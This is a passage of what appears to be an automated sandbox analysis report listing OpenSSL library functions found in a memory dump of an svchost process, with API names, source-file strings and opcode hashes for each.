                                                                                              • API String ID: 3860484807-2058648542
                                                                                              • Opcode ID: 709b0479125af6ee5ac48bb5abcca979a97a6efaebdf1b3626366b99a557ea16
                                                                                              • Instruction ID: 1ada45673fe06c8e28ab951a3afc8be45f3c98d30a02b5e4faf3e438232088d8
                                                                                              • Opcode Fuzzy Hash: 709b0479125af6ee5ac48bb5abcca979a97a6efaebdf1b3626366b99a557ea16
                                                                                              • Instruction Fuzzy Hash: E7F190B2A0AA4282FB61DB39E8407A96760FB84794F448231EF6C476E5DF7CE955C700
                                                                                              Function 00007FFBAB476A60 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastO_test_flagsO_writeR_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\record\methods\tls_common.c$tls_retry_write_records$tls_write_records
                                                                                              • API String ID: 1843479370-2458201149
                                                                                              • Opcode ID: ede5e3c6ce354c2f49d1748be68e7db66be4a252287604ea360b831add1b72e9
                                                                                              • Instruction ID: aabe523c6a4e6d5606578b04a507db8ac05573ca66f7d47791d32c8641fedbd6
                                                                                              • Opcode Fuzzy Hash: ede5e3c6ce354c2f49d1748be68e7db66be4a252287604ea360b831add1b72e9
                                                                                              • Instruction Fuzzy Hash: 67719DA2A0AA4286F7669B35D5853BC33A6FB44B84F148531CF2D43BA5DF39E4A5C340
                                                                                              Function 00007FFBAB498FD0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 152COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$D_bytes_exO_freeO_mallocR_set_debug
                                                                                              • String ID: $ssl\statem\statem_srvr.c$tls_construct_certificate_request
                                                                                              • API String ID: 2305228085-806604038
                                                                                              • Opcode ID: bb80a541e2be7fc510b037927f3aa9222f1d912873188c196b9917cbd6a94ab0
                                                                                              • Instruction ID: 69bb2117957b9cdb534108c89248176be744e720727e5184c38f4f4656d87935
                                                                                              • Opcode Fuzzy Hash: bb80a541e2be7fc510b037927f3aa9222f1d912873188c196b9917cbd6a94ab0
                                                                                              • Instruction Fuzzy Hash: D35185A1B0A28341FB629B72D9967BD6391AF45BC8F04C431DE2D4B7E6DF2DE4418311
                                                                                              Function 00007FFBAB4727B0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 361COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_mallocR_newR_set_debug
                                                                                              • String ID: dtls_rlayer_buffer_record$ssl\record\methods\dtls_meth.c
                                                                                              • API String ID: 681801835-4006006387
                                                                                              • Opcode ID: c0be3d0c48b42ea7a3bf253bd351074edd90b1d770ed0058c570f0b1e35f4c5e
                                                                                              • Instruction ID: 24c2c957b4777eb4308392fc44e40120b11089e6fa2ad0f9598558bbf107f614
                                                                                              • Opcode Fuzzy Hash: c0be3d0c48b42ea7a3bf253bd351074edd90b1d770ed0058c570f0b1e35f4c5e
                                                                                              • Instruction Fuzzy Hash: 700280B2A09B8282E722DF35E5446B933A4FB55788F05D235DEAC47AA5DF38E1D4D300
                                                                                              Function 00007FFBAB42E220 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$M_freeM_move_peernameR_newR_set_debugR_set_errorX509_X509_freeX_free
                                                                                              • String ID: ossl_ssl_connection_reset$ssl\ssl_lib.c
                                                                                              • API String ID: 1979470287-3605862542
                                                                                              • Opcode ID: a0e50fe9858149fb5504f71899189a664d0a7bb69c524f79330ce00391df7f72
                                                                                              • Instruction ID: 6f033dab08a8d39f5eb4cf4615bd6de32a351b8220ba6308c8a33c7642d4f009
                                                                                              • Opcode Fuzzy Hash: a0e50fe9858149fb5504f71899189a664d0a7bb69c524f79330ce00391df7f72
                                                                                              • Instruction Fuzzy Hash: 5D5173B2A4678281E751DF36D4812BD73A8FB84B98F08813ADE6D4B7A9DF38D4418711
                                                                                              Function 00007FFBAB4849C0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 111COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_memdupR_newR_set_debug
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\statem\extensions_srvr.c$tls_parse_ctos_alpn
                                                                                              • API String ID: 779157885-3465918099
                                                                                              • Opcode ID: 3eac08784322b4d9d4b7decba0d182fbbab740dc8df8de132ad9510753ac3106
                                                                                              • Instruction ID: 2d1974a4e1efcca7f0e479c3c38d1749b8530119d868283fd856627f886b11f9
                                                                                              • Opcode Fuzzy Hash: 3eac08784322b4d9d4b7decba0d182fbbab740dc8df8de132ad9510753ac3106
                                                                                              • Instruction Fuzzy Hash: 0B41C4F1A0ABC181EB228BB5E4513B963A1EF45784F048535DFAC17AB6DF3CE1918704
                                                                                              Function 00007FFBAB480340 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_malloc
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_ec_pt_formats
                                                                                              • API String ID: 3068916411-1105300127
                                                                                              • Opcode ID: d20b543ee3beebe62d088556f6f6e37ec077b4b20800f490c5f8ce5d9407d9a8
                                                                                              • Instruction ID: 0e9b8f81679dd6c0a871b85f899833d6313aecfcedb8024d4a7d92a49d18f82b
                                                                                              • Opcode Fuzzy Hash: d20b543ee3beebe62d088556f6f6e37ec077b4b20800f490c5f8ce5d9407d9a8
                                                                                              • Instruction Fuzzy Hash: FE31E4A1A5EB9281F622DB71E8417FD6760EB44788F40C131DEAC477A6DF3CE2958700
                                                                                              Function 00007FFBAB444330 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: N_free$O_free
                                                                                              • String ID: ssl\tls_srp.c
                                                                                              • API String ID: 3506937590-1545769946
                                                                                              • Opcode ID: a0aa9d723761bc43066e25d67ce36c56aafca2db69a64f76014dba336a3dd019
                                                                                              • Instruction ID: 15074d5d2aa31d9a1763fdf58db1893e945ece215511c581cc99887977cab251
                                                                                              • Opcode Fuzzy Hash: a0aa9d723761bc43066e25d67ce36c56aafca2db69a64f76014dba336a3dd019
                                                                                              • Instruction Fuzzy Hash: A721DDA2E55A8281EB61EF71C8A13FC3350EB95B4CF199131DE1D4B16ADF28D5D68310
                                                                                              Function 00007FFBAB45E960 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 291COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BIO_ADDR_family.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA33
                                                                                              • BIO_ADDR_family.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA44
                                                                                              • memcmp.VCRUNTIME140(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA63
                                                                                              • BIO_ADDR_family.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA80
                                                                                              • BIO_ADDR_family.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EA91
                                                                                              • memcmp.VCRUNTIME140(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EAB0
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,00000000,00000000,?,00000001,00007FFBAB469F8F,00000000,?,?,00000004,?,?,00007FFBAB467BE8), ref: 00007FFBAB45EB0E
                                                                                              • BIO_ADDR_clear.LIBCRYPTO-3-X64 ref: 00007FFBAB45EC1E
                                                                                              • BIO_ADDR_clear.LIBCRYPTO-3-X64 ref: 00007FFBAB45EC48
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_family$R_clearmemcmp$O_malloc
                                                                                              • String ID: ssl\quic\quic_record_tx.c
                                                                                              • API String ID: 552621978-2432027203
                                                                                              • Opcode ID: 32a867cf7354396dc50e17b62c3267e615d76f295c64cb9f0ac8b9bcaca93b3f
                                                                                              • Instruction ID: 2a56eed4e95cf959f0a0e2f3bdd300ef43228230ebb6122b4d7833d0571d62d0
                                                                                              • Opcode Fuzzy Hash: 32a867cf7354396dc50e17b62c3267e615d76f295c64cb9f0ac8b9bcaca93b3f
                                                                                              • Instruction Fuzzy Hash: 3AC185A2A4AF4282EA6ACF31D540B7963A4FB44B84F18C635DF6D473A5DF38ED558300
                                                                                              Function 00007FFBAB417BEE Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_strdup
                                                                                              • String ID: ssl3_ctrl$ssl\s3_lib.c
                                                                                              • API String ID: 2909881267-3530330221
                                                                                              • Opcode ID: 81464fcfccb8d5cc0b942b1e4816ac6f7d0422117e21e81cea356ccffdaf2187
                                                                                              • Instruction ID: 0d99f255f814d5f2d52817eb46d6e326bd9421fcc78b4be95c4eb3ee7d95282a
                                                                                              • Opcode Fuzzy Hash: 81464fcfccb8d5cc0b942b1e4816ac6f7d0422117e21e81cea356ccffdaf2187
                                                                                              • Instruction Fuzzy Hash: DF2169F1E5F64651FA23AB66E5423BE2312BF40740F94C43ACD2D066FADE6CE9468310
                                                                                              Function 00007FFBAB4440E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444113
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB44412C
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444144
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444150
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB44415C
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444168
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444174
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444180
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB44418C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: N_free$O_free
                                                                                              • String ID: ssl\tls_srp.c
                                                                                              • API String ID: 3506937590-1545769946
                                                                                              • Opcode ID: 588c221622fd9f9397c94c92d8b00cb2f7c498d30d7df2df0f2271ccf8939536
                                                                                              • Instruction ID: 499b588b6af9bb115108e165d03c7e57054b148713cd754bc0438138337f0bf7
                                                                                              • Opcode Fuzzy Hash: 588c221622fd9f9397c94c92d8b00cb2f7c498d30d7df2df0f2271ccf8939536
                                                                                              • Instruction Fuzzy Hash: 38211092E55AC282EB66DF71C8913FC1314FB94B48F099231FE1C4B56ADF64A2D68310
                                                                                              Function 00007FFBAB43CED0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 155COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_zallocmemset
                                                                                              • String ID: ssl\t1_lib.c$tls1_set_server_sigalgs
                                                                                              • API String ID: 2125936233-369108580
                                                                                              • Opcode ID: 0063be12e3aa0a5680b7b466bd4ad08d65ae94629470a89da5b71de4fd39b615
                                                                                              • Instruction ID: bab4895dc1a26a9bafffffaf17aa974775d496da21c749a66c94266b53262baa
                                                                                              • Opcode Fuzzy Hash: 0063be12e3aa0a5680b7b466bd4ad08d65ae94629470a89da5b71de4fd39b615
                                                                                              • Instruction Fuzzy Hash: B6618FB2A0AA4681EB129B36E4413F927A1FB45F88F4C8031DE2D477A5DF7DE5928350
                                                                                              Function 00007FFBAB462BA0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 144COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OPENSSL_LH_retrieve.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462BEC
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462C23
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462C63
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462C9A
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462CF3
                                                                                              • OPENSSL_LH_retrieve.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462D1A
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462D2E
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462D88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_insert$H_retrieve$O_freeO_zalloc
                                                                                              • String ID: ssl\quic\quic_srtm.c
                                                                                              • API String ID: 3332892965-1571964953
                                                                                              • Opcode ID: 0b0e0732b3e0901c1f5170e4c6a76bc027f72e1e57d7a0f2cef3f43093058a72
                                                                                              • Instruction ID: 2766bbdb2c55f23387f0fec29046f969fd2f70b92b9300c9e7e121d1fc8b2ae7
                                                                                              • Opcode Fuzzy Hash: 0b0e0732b3e0901c1f5170e4c6a76bc027f72e1e57d7a0f2cef3f43093058a72
                                                                                              • Instruction Fuzzy Hash: BF5183A2B0AB4291EA669B36D4A027DA3A0FF44FC4F04C439DE6D477A5EF3CE5558300
                                                                                              Function 00007FFBAB49844C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_memdupR_vset_error
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\statem\statem_srvr.c$tls_process_next_proto
                                                                                              • API String ID: 464498836-56982555
                                                                                              • Opcode ID: 63642cc689758fb4ec4ee4fe9c4727acf58d27852583a43ad9a713bda0192c09
                                                                                              • Instruction ID: 6e8b9b61bc547e212e91a988e493e5bf684660a9e8abbcaa01db69654a176ad7
                                                                                              • Opcode Fuzzy Hash: 63642cc689758fb4ec4ee4fe9c4727acf58d27852583a43ad9a713bda0192c09
                                                                                              • Instruction Fuzzy Hash: 9841E962F0EB8181E7128B25E4402FDA3A0FB95784F088135EF9C17B66EF3CD1958740
                                                                                              Function 00007FFBAB416FC0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl3_setup_key_block$ssl\s3_enc.c
                                                                                              • API String ID: 0-3285098195
                                                                                              • Opcode ID: 3d40ff9ed8ce44778de679dcad4de8540c9c0705278cbbc43176229b5d892b59
                                                                                              • Instruction ID: 159094cf6ad547a27af6edf9363aa35b7303d787ea9013cf1679108dc3c97ab9
                                                                                              • Opcode Fuzzy Hash: 3d40ff9ed8ce44778de679dcad4de8540c9c0705278cbbc43176229b5d892b59
                                                                                              • Instruction Fuzzy Hash: E4419372B49A8282E755DB75F5412ADB3A4FB84B80F408135EFAC87B66EF3CE0558700
                                                                                              Function 00007FFBAB45A910 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A94B
                                                                                              • OPENSSL_LH_new.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A96A
                                                                                              • OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A993
                                                                                              • OPENSSL_LH_new.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9AF
